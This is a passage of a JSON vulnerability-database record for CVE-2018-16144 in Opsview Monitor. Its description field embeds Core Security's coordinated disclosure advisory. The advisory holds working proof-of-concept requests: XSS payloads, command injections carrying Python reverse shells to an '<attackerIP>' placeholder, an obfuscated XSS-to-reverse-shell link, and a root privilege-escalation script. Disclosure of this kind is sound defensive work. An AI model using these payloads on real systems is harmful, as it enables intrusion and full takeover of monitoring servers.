"version": "5.4.2"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.4"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.3"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.0"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.3"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.1"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.3"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.3.1",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16144"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Fernando Diaz, Fernando Catoira",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 0.1
},
"cve": "CVE-2018-16144",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-16144",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-17452",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-16144",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-16144",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-17452",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-153",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2018-16144",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"db": "VULMON",
"id": "CVE-2018-16144"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The test connection functionality in the NetAudit section of Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to command injection due to improper sanitization of the rancid_password parameter. Opsview Monitor Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. OpsviewMonitor is a virtual appliance designed to be deployed in an organization\u0027s network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a command execution vulnerability that allows an attacker to obtain command execution on the system as a nagios user. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nOpsview Monitor Multiple Vulnerabilities\n\n1. **Advisory Information**\n\nTitle: Opsview Monitor Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0008\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities\nDate published: 2018-09-04\nDate of last update: 2018-09-04\nVendors contacted: Opsview\nRelease mode: Coordinated release\n\n2. **Vulnerability Information**\n\nClass: Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Special Elements used in an OS\nCommand [CWE-78], Improper Neutralization of Special Elements used in\nan OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144,\nCVE-2018-16145\n\n3. **Vulnerability Description**\n\nOpsview\u0027s website states that:\n\nOpsview[1] builds monitoring software that helps DevOps understand how\nthe performance of their hybrid IT infrastructure \u0026 apps impacts\nbusiness service delivery. Opsview Monitor supports +3500 Nagios plugins\nand service checks making it easy to monitor everything from Docker and\nVMware to Amazon Web Services, Hyper-V and more. \n\n4. **Vulnerable Packages**\n\n . Opsview Monitor 5.4\n . Opsview Monitor 5.3\n . Opsview Monitor 5.2\n\nOther products and versions might be affected, but they were not tested. \n\n5. **Vendor Information, Solutions and Workarounds**\n\nOpsview released the following versions of its product that fix the\nreported issues. Opsview Monitor 6.0\n . Opsview Monitor 5.4.2\n . Opsview Monitor 5.3.1\n\nIn addition, Opsview published the following release notes:\n\n . https://knowledge.opsview.com/v5.4/docs/whats-new\n . https://knowledge.opsview.com/v5.3/docs/whats-new\n\n6. **Credits**\n\nThese vulnerabilities were discovered and researched by Fernando Diaz\nand Fernando Catoira from Core Security Consulting Services. The\npublication of this advisory was coordinated by Leandro Cuozzo from Core\nAdvisories Team. \n \n7. \nMultiple vulnerabilities were found in the context of this appliance,\nwhich could allow a remote attacker to compromise the system. \nVulnerabilities described in 7.1 and 7.2 could be abused to execute\nmalicious JavaScript code in the context of a legitimate user. Finally, the\nissue found in one of the scripts run during the boot process presented\nin 7.5 would allow attackers to elevate their privileges from nagios\nuser to root after a system restart, hence obtaining full control of the\nappliance. \n\n7.1. **Reflected Cross-Site Scripting in Diagnostics**\n\n[CVE-2018-16148] The \u0027diagnosticsb2ksy\u0027 parameter of the \u0027/rest\u0027\nendpoint is vulnerable to Cross-Site Scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401;\nauth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n-----/\n\n7.2. **Persistent Cross-Site Scripting in Settings endpoint**\n\n[CVE-2018-16147] The \u0027data\u0027 parameter of the \u0027/settings/api/router\u0027\nendpoint is vulnerable to Cross-Site Scripting. The following proof of\nconcept demonstrates the vulnerability:\n \n/-----\nPOST /settings/api/router?_dc=1521575692128 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: rifle\nx-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 506\nCookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256;\nauth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D\nConnection: close\n\n[{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":2},{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"profile\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":3}]\n-----/\n\nThe input will be stored without any sanitization and rendered every\ntime the /settings section is visited by the user. It\u0027s important to\npoint that this XSS is self stored and it\u0027s executed only in the context\nof the victim\u0027s session. However, this vulnerability can be exploited by\nan attacker to gain persistency and execute the malicious code each time\nthe victim accesses to the settings section. \nExcerpt of the source code showing the injected script tag:\n\n/-----\n[{\"property\":\"name\",\"root\":\"data\",\"direction\":\"ASC\"}]}},\"contact\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"name\",\"root\":\"data\"}]}},\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"pageSize\":50,\"filters\":[],\"page\":1}},\"hostcheckcommand\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"priority\",\"root\":\"data\"}]}},\"netflow_collector\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"page\":1,\"filters\":[],\"pageSize\":50}},\"\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"\n-----/\n\n7.3. **Notification abuse leading to remote command execution**\n\n[CVE-2018-16146] Opsview Web Management console provides a functionality\naccessible by an authenticated administrator to test notifications that\nare triggered under certain configurable events. The \u0027value\u0027 parameter\nis not properly sanitized, leading to an arbitrary command injection\nexecuted on the system with nagios\u0027 user privileges. \n \nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/notificationmethod/testnotification?_dc=1520444703477\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0)\nGecko/20100101 Firefox/58.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 376\nCookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0;\nopsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13;\nauth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nConnection: close\n\n{\"message\":\"Test\nMessage\",\"command\":\"submit_xmpp_script\",\"variables\":[],\"test_variables\":[{\"name\":\"PAGER\",\"value\":\"123123123\n|| python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\u003cattackerIP\u003e\\\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);\u0027\"}],\"id\":\"20\"}\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nAdditionally, it is possible to combine this issue with a redirection\nfunctionality within the management console and the vulnerability\ndescribed in 7.1 (Reflected Cross-Site Scripting), to build a specially\ncrafted link that could be sent to an administrator to trigger a reverse\nshell. \n\nIn order to perform the attack, consider the following:\n\n. API\u0027s sensitive actions require a \u0027restToken\u0027 to be processed. This\ntoken could be obtained by a Cross-Site Scripting attack from a specific\nendpoint (/settings). Abuse the login page redirection functionality to force the user to\naccess the Cross-Site Scripting vulnerable URL described in 7.1 (you may\nalso abuse the Cross-Site scripting vulnerability reported in\nhttps://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). \nIf the user is already authenticated he will be automatically redirected. \nOtherwise, the login page will appear and the redirection will take\nplace after a successful login. \n\nThe following proof of concept presents a crafted link that could\ntrigger a reverse shell if accessed by an administrator:\n\n/-----\nhttps://\u003cserverIP\u003e/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1\n-----/\n\nOnce clicked, the authenticated administrator will be redirected to the\nvulnerable section where his browser will perform a request to the\n\u0027/settings\u0027 endpoint in order to obtain a valid \u0027restToken\u0027. Finally,\nusing that token, the API request to\n\u0027rest/config/notificationmethod/testnotification\u0027 will be exploited thus\nresulting in a reverse shell. \n\n7.4. **Rancid test connection functionality abuse leading to command\nexecution**\n\n[CVE-2018-16144] NetAudit is a section within Network Analyzer that\nallows the user to automate the backing up of network devices\u0027\nconfiguration files to a centralized location. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: b3d716e0157fd6337e6978220188051d8c578850\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 434\nCookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f;\nauth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nConnection: close\n\nip=\u003cattackerIP\u003e++++++\u0026rancid_vendor=1\u0026rancid_username=234234+add+password+xxxxx\u0026rancid_connection_type=telnet\u0026rancid_autoenable=1\u0026rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+\u0027import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((\"\u003cattackerIP\u003e\",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b\u0027`\u0026host_id=2\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n$ uname -a\nLinux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34\nUTC 2018 x86_64 x86_64 x86_64 GNU/Linux\n-----/\n\n7.5. **Script modification could allow local privilege escalation**\n\n[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios\nprivileges and the scripts that run at boot time, impersonate nagios\nuser during its execution. However, the\n\u0027/etc/init.d/opsview-reporting-module\u0027 script invokes the\n\u0027/opt/opsview/jasper/bin/db_jasper\u0027 script before dropping root\nprivileges. \n \nThe following excerpt shows the vulnerable code:\n \n/-----\n/etc/init.d/opsview-reporting-module:\n\n/opt/opsview/jasper/bin/db_jasper db_exists 2\u003e /dev/null\nif [ $? != 0 ]; then\n echo \"Attempted to start jasperserver but MySQL credentials are wrong.\"\n exit 0\nfi\n\nDAEMON=/opt/opsview/jasper/bin/rc.jasperserver\n\ntest -x $DAEMON || exit 0\n\n# Switch to opsview user if run as root\nid | grep \"uid=0(\" \u003e/dev/null\nif [ $? = 0 ] ; then\n su - opsview -c \"$DAEMON $@\"\nelse\n exec $DAEMON $@\nfi\n-----/\n\nThe file \u0027/opt/opsview/jasper/bin/db_jasper\u0027, which is invoked by the\nvulnerable script, can be edited by the nagios user which belongs to the\n\u0027opsview\u0027 group. \n \n/-----\nls -ltr /opt/opsview/jasper/bin/db_jasper\n-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017\n/opt/opsview/jasper/bin/db_jasper\nnagios@image-builder-299:/home/admin$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nSince \u0027db_jasper\u0027 receives \u0027db_exists\u0027 as an argument, which is later\nused in a case statement, an attacker could edit that specific part of\nthe script in order to execute arbitrary code once the appliance is\nrebooted. \n\nThe following excerpt shows the attacker\u0027s bash script which, after\nexecution, will trigger a reverse shell with root privileges:\n\n/-----\nwhile [ \"x$1\" != \"x\" ] ; do\n case \"$1\" in\n db_export)\n db_export\n ;;\n db_export_test)\n db_export_test\n ;;\n db_export_initial)\n TEST=1\n db_backup\n ;;\n db_import)\n db_import\n ;;\n db_install)\n db_install\n ;;\n db_backup)\n db_backup\n ;;\n db_restore)\n db_restore\n ;;\n db_exists)\n python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\u003cattackerIP\u003e\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);\u0027 \u0026\n db_exists\n exit $?\n ;;\n db_upgrade)\n db_upgrade\n exit $?\n ;;\n *)\n die \"Usage: $0\n{db_export|db_import|db_install|db_backup|db_restore}\"\n ;;\n\n esac\n shift\ndone\n-----/\n\n/-----\n$nc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 45566)\n# id\nuid=0(root) gid=0(root) groups=0(root)\n-----/\n\n8. **Report Timeline**\n\n2018-05-03: Core Security sent an initial notification to Opsview,\nasking for GPG keys in order to send draft advisory. \n2018-05-04: Opsview replied attaching its GPG keys. \n2018-05-04: Core Security sent the encrypted draft advisory. \n2018-05-04: Opsview confirmed the reception of the advisory and informed\nan initial response would be ready by May 11th. \n2018-05-11: Opsview replied saying they were able to reproduce all of\nthe reported vulnerabilities and confirmed that they were present in all\nsupported versions of Opsview Monitor (5.4, 5.3 and 5.2). \nIn addition, Opsview informed that were planning to release a fix for\nthese versions by the end of July. \n2018-05-11: Core Security thanked the confirmation. \n2018-06-25: Opsview informed that they were planning to release a major\nupdate for the product (6.0) at the end of July. This update will\naddress all reported vulnerabilities. Also, they informed that the\nprevious versions of the product would be fixed by the end of August. \n2018-06-27: Core Security thanked the status update and asked for a\ntentative public disclosure date. \n2018-07-16: Core Security requested a status update. \n2018-07-18: Opsview proposed to set a tentative publication date by the\nend of August when they release the fixes for its earlier versions. \n2018-07-18: Core Security agreed with the Opsview\u0027s proposal. \n2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0\nrelease will be available on July 25th. In addition, they\ninformed that they didn\u0027t have the exact release date for the updates to\nprevious versions of the product. \n2018-08-06: Core Security requested a status update for the remaining\nfixes. \n2018-08-13: Opsview replied saying that they were targeting the week 